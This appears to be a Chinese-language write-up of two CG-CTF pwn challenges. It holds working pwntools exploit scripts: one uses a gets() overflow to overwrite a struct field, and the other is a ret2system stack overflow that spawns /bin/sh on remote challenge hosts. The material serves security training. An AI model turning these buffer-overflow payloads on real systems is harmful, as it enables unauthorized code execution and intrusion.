CG-CTF pwn部分wp

面向pwn刷cgctf
PWN
1,When did you born
题目给了一个ELF文件,和一个.C文件
先运行ELF,大概如下
What’s Your Birth?
0
What’s Your Name?
0
You Are Born In 0
You Are Naive.
You Speed One Second Here.
打开.C文件,发现是ELF的源码

 
#include <stdio.h>

struct Student {
    char name[8];
    int birth;
};

int main(void) {
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    struct Student student;
    printf("What\'s Your Birth?\n");
    scanf("%d", &student.birth);
    while (getchar() != '\n') ;
    if (student.birth == 1926) {
        printf("You Cannot Born In 1926!\n");
        return 0;
    }
   printf("What\'s Your Name?\n");
    gets(student.name);
    printf("You Are Born In %d\n", student.birth);
    if (student.birth == 1926) {
        printf("You Shall Have Flag.\n");
        system("cat flag");
    } else {
        printf("You Are Naive.\n");
        printf("You Speed One Second Here.\n");
    }
    return 0;
}

 

name对边界没有限制,于是可以像name输入,使其覆盖birth为1926
用pwntools

 
from pwn import *
sh=remote('ctf.acdxvfsvd.net',1926)
sh.recv()
sh.sendline('0')
sh.recv()
sh.sendline('0'*8+'\x86'+'\x07')
sh.interactive()

 

得到flag
2,Stack Overflow
一道栈溢出题,用IDA分析
在这里插入图片描述
看出在message函数处有溢出,但fgets限制了s的输入,看bss段
在这里插入图片描述
A与n在一起,可通过对A的输入改变n的限制
在pwnme函数中有system的出现,但参数不是/bin/sh,向A中写入/bin/sh,把A作为system的参数
编写脚本

 
from pwn import *
r = remote('182.254.217.142', 10001)
p = ELF('/home/harmonica/Desktop/cgpwna' )
#r = process('/home/harmonica/Desktop/cgpwna' )

r.sendline('1')
r.recv()
r.sendline('/bin/sh\0'+'a'*(0x28))
payload = 'a'*(0x34) + p32(p.symbols['system'])+'a'*4+p32(0x804a080)
r.recv()
r.sendline(payload)
r.interactive()

 

cat /home/pwn/flag
得到 flag

猜你喜欢

转载自www.cnblogs.com/harmonica11/p/11365296.html
0条评论
添加一条新回复